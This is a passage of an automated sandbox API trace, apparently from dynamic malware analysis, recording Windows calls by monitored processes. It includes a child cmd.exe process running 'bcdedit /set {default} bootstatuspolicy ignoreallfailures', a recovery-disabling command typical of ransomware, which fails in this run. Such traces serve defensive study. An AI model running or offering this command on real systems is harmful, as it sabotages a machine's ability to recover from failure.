GetProcessHeap () returned 0x370000 [0077.111] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x418) returned 0x3707f0 [0077.111] SetErrorMode (uMode=0x0) returned 0x0 [0077.111] SetErrorMode (uMode=0x1) returned 0x0 [0077.111] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3707f8, lpFilePart=0x14f190 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f190*="Desktop") returned 0x25 [0077.111] SetErrorMode (uMode=0x0) returned 0x1 [0077.111] GetProcessHeap () returned 0x370000 [0077.111] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x3707f0, Size=0x64) returned 0x3707f0 [0077.111] GetProcessHeap () returned 0x370000 [0077.111] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x3707f0) returned 0x64 [0077.111] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0077.111] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0077.111] GetProcessHeap () returned 0x370000 [0077.111] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x120) returned 0x3833a0 [0077.111] GetProcessHeap () returned 0x370000 [0077.111] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x238) returned 0x370860 [0077.118] GetProcessHeap () returned 0x370000 [0077.118] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x370860, Size=0x122) returned 0x370860 [0077.118] GetProcessHeap () returned 0x370000 [0077.118] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x370860) returned 0x122 [0077.118] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0077.118] GetProcessHeap () returned 0x370000 [0077.119] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xe0) returned 0x3834c8 [0077.119] RtlReAllocateHeap (Heap=0x370000, 
Flags=0x0, Ptr=0x3834c8, Size=0x76) returned 0x3834c8 [0077.119] GetProcessHeap () returned 0x370000 [0077.119] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x3834c8) returned 0x76 [0077.119] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.119] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.119] GetLastError () returned 0x2 [0077.119] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.120] GetLastError () returned 0x2 [0077.120] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.120] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.385] GetLastError () returned 0x2 [0077.385] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.385] GetLastError () returned 0x2 [0077.385] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.385] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.385] GetLastError () returned 0x2 [0077.385] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.385] 
GetLastError () returned 0x2 [0077.385] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.386] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.386] GetLastError () returned 0x2 [0077.386] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.386] GetLastError () returned 0x2 [0077.386] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.386] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.480] GetLastError () returned 0x2 [0077.480] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.480] GetLastError () returned 0x2 [0077.480] _get_osfhandle (_FileHandle=2) returned 0xb [0077.480] GetFileType (hFile=0xb) returned 0x2 [0077.481] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0077.481] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f360 | out: lpMode=0x14f360) returned 1 [0077.481] _get_osfhandle (_FileHandle=2) returned 0xb [0077.481] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14f394 | out: lpConsoleScreenBufferInfo=0x14f394) returned 1 [0077.481] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a834640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external 
command,\r\noperable program or batch file.\r\n") returned 0x5d [0077.482] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a834640, nSize=0x2000, Arguments=0x14f3d4 | out: lpBuffer="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0077.482] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a834640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x14f3b8, lpReserved=0x0 | out: lpBuffer=0x4a834640*, lpNumberOfCharsWritten=0x14f3b8*=0x62) returned 1 [0077.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.482] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0077.483] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.483] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0077.483] _get_osfhandle (_FileHandle=0) returned 0x3 [0077.483] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0077.483] SetConsoleInputExeNameW () returned 0x1 [0077.483] GetConsoleOutputCP () returned 0x1b5 [0077.483] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0077.483] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.483] exit (_Code=1) Process: id = "13" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4531e000" os_pid = "0xb98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT 
AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 43 os_tid = 0xb7c [0076.987] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33fb1c | out: lpSystemTimeAsFileTime=0x33fb1c*(dwLowDateTime=0xf2a9c880, dwHighDateTime=0x1d61645)) [0076.987] GetCurrentProcessId () returned 0xb98 [0076.987] GetCurrentThreadId () returned 0xb7c [0076.988] GetTickCount () returned 0x11497cd [0076.988] QueryPerformanceCounter (in: lpPerformanceCount=0x33fb14 | out: lpPerformanceCount=0x33fb14*=19734228435) returned 1 [0076.989] GetModuleHandleA (lpModuleName=0x0) returned 0x4a800000 [0076.989] __set_app_type (_Type=0x1) [0076.989] __p__fmode () returned 0x770331f4 [0076.989] __p__commode () returned 0x770331fc [0076.989] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8221a6) returned 0x0 [0076.989] __getmainargs (in: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c, _DoWildCard=0, _StartInfo=0x4a824140 | out: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c) returned 0 [0076.990] GetCurrentThreadId () returned 0xb7c [0076.990] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb7c) returned 0x60 [0076.990] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.990] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0076.990] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.123] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0077.123] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x33faac | out: phkResult=0x33faac*=0x0) returned 0x2 [0077.123] VirtualQuery (in: lpAddress=0x33fae3, lpBuffer=0x33fa7c, dwLength=0x1c | out: lpBuffer=0x33fa7c*(BaseAddress=0x33f000, 
AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0077.123] VirtualQuery (in: lpAddress=0x240000, lpBuffer=0x33fa7c, dwLength=0x1c | out: lpBuffer=0x33fa7c*(BaseAddress=0x240000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0077.123] VirtualQuery (in: lpAddress=0x241000, lpBuffer=0x33fa7c, dwLength=0x1c | out: lpBuffer=0x33fa7c*(BaseAddress=0x241000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0077.123] VirtualQuery (in: lpAddress=0x243000, lpBuffer=0x33fa7c, dwLength=0x1c | out: lpBuffer=0x33fa7c*(BaseAddress=0x243000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0077.123] VirtualQuery (in: lpAddress=0x340000, lpBuffer=0x33fa7c, dwLength=0x1c | out: lpBuffer=0x33fa7c*(BaseAddress=0x340000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x160000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0077.123] GetConsoleOutputCP () returned 0x1b5 [0077.123] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0077.124] SetConsoleCtrlHandler (HandlerRoutine=0x4a81e72a, Add=1) returned 1 [0077.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.124] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0077.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.124] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0077.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.124] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0077.124] _get_osfhandle (_FileHandle=0) returned 0x3 [0077.124] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0077.125] _get_osfhandle (_FileHandle=0) returned 0x3 [0077.125] 
SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0077.125] GetEnvironmentStringsW () returned 0x6920a0* [0077.125] GetProcessHeap () returned 0x680000 [0077.125] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xaca) returned 0x692b78 [0077.125] FreeEnvironmentStringsW (penv=0x6920a0) returned 1 [0077.125] GetProcessHeap () returned 0x680000 [0077.125] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4) returned 0x690cd8 [0077.125] GetEnvironmentStringsW () returned 0x6920a0* [0077.125] GetProcessHeap () returned 0x680000 [0077.125] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xaca) returned 0x693650 [0077.126] FreeEnvironmentStringsW (penv=0x6920a0) returned 1 [0077.126] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x33ea1c | out: phkResult=0x33ea1c*=0x68) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x0, lpData=0x33ea28*=0x0, lpcbData=0x33ea20*=0x1000) returned 0x2 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, lpData=0x33ea28*=0x1, lpcbData=0x33ea20*=0x4) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x0, lpData=0x33ea28*=0x1, lpcbData=0x33ea20*=0x1000) returned 0x2 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, lpData=0x33ea28*=0x0, lpcbData=0x33ea20*=0x4) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, 
lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, lpData=0x33ea28*=0x40, lpcbData=0x33ea20*=0x4) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, lpData=0x33ea28*=0x40, lpcbData=0x33ea20*=0x4) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x0, lpData=0x33ea28*=0x40, lpcbData=0x33ea20*=0x1000) returned 0x2 [0077.126] RegCloseKey (hKey=0x68) returned 0x0 [0077.126] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x33ea1c | out: phkResult=0x33ea1c*=0x68) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x0, lpData=0x33ea28*=0x40, lpcbData=0x33ea20*=0x1000) returned 0x2 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, lpData=0x33ea28*=0x1, lpcbData=0x33ea20*=0x4) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x0, lpData=0x33ea28*=0x1, lpcbData=0x33ea20*=0x1000) returned 0x2 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, lpData=0x33ea28*=0x0, lpcbData=0x33ea20*=0x4) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, 
lpData=0x33ea28*=0x9, lpcbData=0x33ea20*=0x4) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, lpData=0x33ea28*=0x9, lpcbData=0x33ea20*=0x4) returned 0x0 [0077.127] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x0, lpData=0x33ea28*=0x9, lpcbData=0x33ea20*=0x1000) returned 0x2 [0077.127] RegCloseKey (hKey=0x68) returned 0x0 [0077.127] time (in: timer=0x0 | out: timer=0x0) returned 0x5e9c43c9 [0077.127] srand (_Seed=0x5e9c43c9) [0077.127] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0077.127] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0077.127] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0077.127] GetProcessHeap () returned 0x680000 [0077.127] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x210) returned 0x6920a0 [0077.127] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6920a8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0077.127] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0077.127] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0077.127] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0077.127] 
_wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0077.127] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0077.127] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0077.128] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0077.128] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0077.128] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0077.128] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0077.128] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0077.128] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0077.128] GetProcessHeap () returned 0x680000 [0077.128] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x692b78 | out: hHeap=0x680000) returned 1 [0077.128] GetEnvironmentStringsW () returned 0x6922b8* [0077.128] GetProcessHeap () returned 0x680000 [0077.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xae2) returned 0x694c18 [0077.128] FreeEnvironmentStringsW (penv=0x6922b8) returned 1 [0077.128] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0077.128] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0077.128] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0077.128] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0077.128] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0077.128] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0077.128] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0077.128] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0077.128] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0077.128] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0077.128] GetProcessHeap () returned 0x680000 [0077.128] RtlAllocateHeap 
(HeapHandle=0x680000, Flags=0x8, Size=0x54) returned 0x695708 [0077.128] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x33f7e8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0077.129] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x33f7e8, lpFilePart=0x33f7e4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x33f7e4*="Desktop") returned 0x25 [0077.129] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0077.129] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x33f564 | out: lpFindFileData=0x33f564*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x691f20 [0077.129] FindClose (in: hFindFile=0x691f20 | out: hFindFile=0x691f20) returned 1 [0077.129] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x33f564 | out: lpFindFileData=0x33f564*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x691f20 [0077.129] FindClose (in: hFindFile=0x691f20 | out: hFindFile=0x691f20) returned 1 [0077.129] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0077.129] FindFirstFileW 
(in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x33f564 | out: lpFindFileData=0x33f564*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe392fd80, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xe392fd80, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x691f20 [0077.129] FindClose (in: hFindFile=0x691f20 | out: hFindFile=0x691f20) returned 1 [0077.129] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0077.129] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0077.129] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0077.129] GetProcessHeap () returned 0x680000 [0077.130] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x694c18 | out: hHeap=0x680000) returned 1 [0077.130] GetEnvironmentStringsW () returned 0x694128* [0077.130] GetProcessHeap () returned 0x680000 [0077.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xb36) returned 0x695f68 [0077.130] FreeEnvironmentStringsW (penv=0x694128) returned 1 [0077.130] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0077.130] GetProcessHeap () returned 0x680000 [0077.130] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695708 | out: hHeap=0x680000) returned 1 [0077.130] GetProcessHeap () returned 0x680000 [0077.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x400e) returned 0x696aa8 [0077.130] GetProcessHeap () returned 0x680000 [0077.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x80) 
returned 0x692df8 [0077.130] GetProcessHeap () returned 0x680000 [0077.130] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696aa8 | out: hHeap=0x680000) returned 1 [0077.130] GetConsoleOutputCP () returned 0x1b5 [0077.131] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0077.131] GetUserDefaultLCID () returned 0x409 [0077.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a824950, cchData=8 | out: lpLCData=":") returned 2 [0077.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x33f928, cchData=128 | out: lpLCData="0") returned 2 [0077.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x33f928, cchData=128 | out: lpLCData="0") returned 2 [0077.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x33f928, cchData=128 | out: lpLCData="1") returned 2 [0077.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a824940, cchData=8 | out: lpLCData="/") returned 2 [0077.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a824d80, cchData=32 | out: lpLCData="Mon") returned 4 [0077.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a824d40, cchData=32 | out: lpLCData="Tue") returned 4 [0077.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a824d00, cchData=32 | out: lpLCData="Wed") returned 4 [0077.132] GetLocaleInfoW 